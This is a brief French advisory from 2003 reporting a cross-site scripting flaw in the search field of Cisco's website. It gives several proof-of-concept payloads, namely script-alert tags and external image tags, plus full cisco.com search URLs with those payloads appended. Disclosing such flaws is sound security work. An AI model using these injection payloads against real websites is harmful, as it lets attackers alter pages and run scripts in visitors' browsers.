|
Vulnérabilité du site web de Cisco |
|
Écrit par labo-cisco
|
|
10-01-2003 |
|
Vulnérabilité XSS sur le site web de Cisco
Une vulnérabilité
de type Cross Site Scripting a été découverte sur le site
de Cisco. Cette vulnérabilité permettrait de modifier le code HTML
des pages comme si le contenu était celui de founit par Cisco, ou substituer
les applications javascripts par des applications tierces.
Détails
Si vous tapez les scripts suivants dans le champ de recherche
:
?<scr!pt%alert('cisco systems site XSS')</scr!pt>
?<img src%"http://www.host.com/image.gif">
ou si vous entrez ces urls :
?http://www.cisco.com/pcgi-bin/search/search.pl"<scr!pt>alert('cisco
systems site XSS')</script>"
?http://www.cisco.com/pcgi-bin/search/search.pl"<img src="http://www.megahz.org/images/megahz.gif">"
cela executera le script du coté client.
|
|
Dernière mise à jour : ( 10-01-2003 )
|
